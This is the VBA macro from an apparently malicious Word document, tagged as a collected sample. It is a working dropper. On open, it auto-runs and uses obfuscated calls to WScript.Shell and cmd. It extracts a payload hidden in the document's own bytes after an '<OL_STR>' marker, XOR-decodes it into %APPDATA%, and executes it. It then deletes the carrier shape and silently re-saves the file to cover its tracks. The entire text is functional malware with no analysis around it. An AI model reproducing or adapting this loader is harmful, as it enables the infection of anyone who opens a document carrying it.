Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function l1BC0nplCkV(ByVal DEYtQoZ, ByVal qTt8R7BsVB, ByVal L3hkoJNM, ByVal TDjja2ZZ8W9z)
    On Error Resume Next
    DEYtQoZ.Run qTt8R7BsVB, L3hkoJNM, TDjja2ZZ8W9z
End Function

Function vTyvRfpJV(ByVal H3_lGGKpVSJ)
    On Error Resume Next
    Set vTyvRfpJV = CreateObject(H3_lGGKpVSJ)
End Function

Sub AutoOpen()
    On Error Resume Next
    Workbook_Open
End Sub

Sub Workbook_Open()
    On Error Resume Next
    For Each QaoGU_W In ActiveDocument.Sections(1).Range.InlineShapes
        If Left(QaoGU_W.AlternativeText, 3) = "r" & StrReverse("nu") Then
            Dim ug1OF_fQUgi: ug1OF_fQUgi = 0
            Dim DrEvLrTtnrg: DrEvLrTtnrg = Split(QaoGU_W.AlternativeText, "|")
            Dim kJYVQDMqMpZ: kJYVQDMqMpZ = 0
            Dim qBZrJy7vV: qBZrJy7vV = 0
            Dim CNaBRT7QZ: CNaBRT7QZ = 0
            Dim wXzJaMtk6giC: wXzJaMtk6giC = Int(DrEvLrTtnrg(2))
            Dim MePH6ckvZ As Byte
            Dim YuwUI9n: Set YuwUI9n = vTyvRfpJV(StrReverse("SW") & Right(ActiveDocument.Name, 1) & "ript.Sh" & StrReverse("lle"))
            Dim Q9FPJbDdW: Q9FPJbDdW = YuwUI9n.ExpandEnvironmentStrings("%APPDATA%")
            Application.Run "l1BC0nplCkV", YuwUI9n, StrReverse(""" ridkm c/ dmc") & Q9FPJbDdW & StrReverse("tixe & """), 0, True
            If Not Right(Q9FPJbDdW, 1) = "\" Then: Q9FPJbDdW = Q9FPJbDdW & "\"
            Q9FPJbDdW = Q9FPJbDdW & DrEvLrTtnrg(1)
            Dim AVaz7BHrpKGv: AVaz7BHrpKGv = FreeFile
            Kill Q9FPJbDdW
            Open Q9FPJbDdW For Binary Lock Write As #AVaz7BHrpKGv
            Dim HFRHGkCYv: HFRHGkCYv = FreeFile
            Open ActiveDocument.FullName For Binary Access Read As #HFRHGkCYv
            Do While Not EOF(HFRHGkCYv)
                Get HFRHGkCYv, , MePH6ckvZ
                If kJYVQDMqMpZ = 8 Then
                    qBZrJy7vV = qBZrJy7vV + 1
                    kJYVQDMqMpZ = 0
                End If
                If qBZrJy7vV = 0 Then
                    If Chr(MePH6ckvZ) = Chr(60) Then
                        kJYVQDMqMpZ = 1
                    ElseIf Chr(MePH6ckvZ) = Chr(79) And kJYVQDMqMpZ = 1 Then
                        kJYVQDMqMpZ = kJYVQDMqMpZ + 1
                    ElseIf Chr(MePH6ckvZ) = Chr(76) And kJYVQDMqMpZ = 2 Then
                        kJYVQDMqMpZ = kJYVQDMqMpZ + 1
                    ElseIf Chr(MePH6ckvZ) = Chr(95) And kJYVQDMqMpZ = 3 Then
                        kJYVQDMqMpZ = kJYVQDMqMpZ + 1
                    ElseIf Chr(MePH6ckvZ) = Chr(83) And kJYVQDMqMpZ = 4 Then
                        kJYVQDMqMpZ = kJYVQDMqMpZ + 1
                    ElseIf Chr(MePH6ckvZ) = Chr(84) And kJYVQDMqMpZ = 5 Then
                        kJYVQDMqMpZ = kJYVQDMqMpZ + 1
                    ElseIf Chr(MePH6ckvZ) = Chr(82) And kJYVQDMqMpZ = 6 Then
                        kJYVQDMqMpZ = kJYVQDMqMpZ + 1
                    ElseIf Chr(MePH6ckvZ) = Chr(62) And kJYVQDMqMpZ = 7 Then
                        kJYVQDMqMpZ = kJYVQDMqMpZ + 1
                    Else
                        kJYVQDMqMpZ = 0
                    End If
                Else
                    If ug1OF_fQUgi = Len("V_3EwEYf8VU.jurPP") Then ug1OF_fQUgi = 1 Else ug1OF_fQUgi = ug1OF_fQUgi + 1
                    Put #AVaz7BHrpKGv, , CByte(MePH6ckvZ) Xor CByte(Asc(Mid("V_3EwEYf8VU.jurPP", ug1OF_fQUgi, 1)))
                    CNaBRT7QZ = CNaBRT7QZ + 1
                    If CNaBRT7QZ >= wXzJaMtk6giC Then: Exit Do
                End If
            Loop
            Close #HFRHGkCYv
            Close #AVaz7BHrpKGv
            Application.Run "l1BC0nplCkV", YuwUI9n, """" & Q9FPJbDdW & """", 1, False
            Application.DisplayAlerts = wdAlertsNone
            QaoGU_W.Delete
            ActiveDocument.Save
            Application.DisplayAlerts = wdAlertsAll
            Exit For
        End If
    Next QaoGU_W
End Sub


INQUEST-PP=macro
